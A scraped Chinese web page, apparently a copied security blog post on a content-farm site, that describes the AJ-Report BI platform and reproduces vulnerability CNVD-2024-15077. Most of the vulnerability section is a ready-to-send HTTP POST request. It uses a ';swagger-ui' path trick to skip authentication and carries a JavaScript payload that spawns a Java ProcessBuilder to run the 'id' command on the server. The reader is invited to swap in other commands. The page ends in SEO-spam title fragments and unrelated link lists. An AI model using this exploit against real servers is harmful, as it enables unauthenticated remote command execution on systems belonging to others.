当前位置: 首页 > wzjs >正文

阿里巴巴网站是怎么做的怎么搜索整个网站内容

阿里巴巴网站是怎么做的,怎么搜索整个网站内容,企业免费推广网站,青岛网站建设 大公司目录 AJ-Report是什么 CNVD-2024-15077(AJ-Report认证绕过和远程代码执行漏洞) AJ-Report是什么 AJ-Report是完全开源的BI(Business intelligence)平台,旨在帮助用户生成和管理各种类型的报表。它通常用于web应用中,用于分析和展示数据,常用于…

目录

AJ-Report是什么

 CNVD-2024-15077(AJ-Report认证绕过和远程代码执行漏洞)


AJ-Report是什么

        AJ-Report是完全开源的BI(Business intelligence)平台,旨在帮助用户生成和管理各种类型的报表。它通常用于web应用中,用于分析和展示数据,常用于企业和数据密集型系统中。AJ-Report支持多种便捷功能。

  • 报表设计器:允许用户通过图形化界面设计报表,无需编写复杂的代码。
  • 数据源支持:可以与数据库、API 等多种数据源连接,支持多种数据格式(如 SQL、NoSQL 等)。
  • 可定制性:支持定制报表的布局、样式、格式等,满足不同的业务需求。
  • 导出功能:用户可以将生成的报表导出为 PDF、Excel 等格式,便于分享和存档。

 CNVD-2024-15077(AJ-Report认证绕过和远程代码执行漏洞)

        漏洞成因:verification方法未对传入的参数进行过滤,可以执行JavaScript函数。导致命令执行漏洞。代码使用engine.eval(validationRules)执行传入的validationRules字符串。validationRules字符串可来自用户输入,没有对用户输入做验证和清理,恶意用户可构造恶意的JavaScript代码传递给validationRules,从而在服务器上执行恶意命令。

版本要求:AJ-Report < 1.4.0

账号要求:无需登录,无需账号。

步骤1:构造数据包如下

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

调用Swagger UI 接口发送的POST数据包,以JSON格式传递数据,在key为validationRules中构造命令。

步骤2:查看结果

切换命令测试

http://www.dtcms.com/wzjs/542343.html

相关文章:

  • 备案查询站长工具海口小程序制作公司
  • 电子商城网站建设 模板互联网产品设计网站
  • 网站推广制作有口碑的免费网站建设
  • 绵阳市公司网站建设wordpress301跳转插件
  • 做一个交易平台网站的成本合肥互联网公司
  • 网站开发属于什么科目wordpress linux 权限
  • 素马网站设计公司淘点金wordpress插件
  • 原创作文网站wordpress标签云添加
  • 网站优化改动怎么做每平每方设计家官网
  • 网站的开发建设费公司产品推广方案
  • 织梦网站手机页怎么做中国菲律宾南海开战
  • 襄樊北京网站建设兰州网新公司
  • 泰安网站建设公司排名郑州做网站首选九零后网络
  • 江苏省工程建设标准定额网站网站开发可以用gif吗
  • 网站让女友做网站模特网站内容与标题的区别
  • 制作企业网站公司排名珠海电脑自己建网站
  • 凡科网做网站能达到什么效果个人网站做跳转怎么弄
  • 做网站能接到项目工程吗建设企业网站是静态还是动态好
  • wordpress 角色和权限管理seo优化知识总结
  • 衡阳县专业做淘宝网站托管竞价账户哪家好
  • 网站vps广东专业网站开发
  • 网站招标书怎么做WordPress安卓APP不能绑定
  • 中国空间站建成时间网站建设怎样接业务
  • 德州市建设局网站微信小网站制作
  • 培训行业网站建设seo营销是指
  • 网站建设销售客户疑问交互比较好的网站
  • 云南网站建设设计泉州网站设计招聘网
  • 海南智能网站建设公司怎么做网站推广实际效果好
  • 网站建设目的与意义网站报价文档
  • 模型下载网站开发流程图再高权重网站加自己的链接会容易被收录吗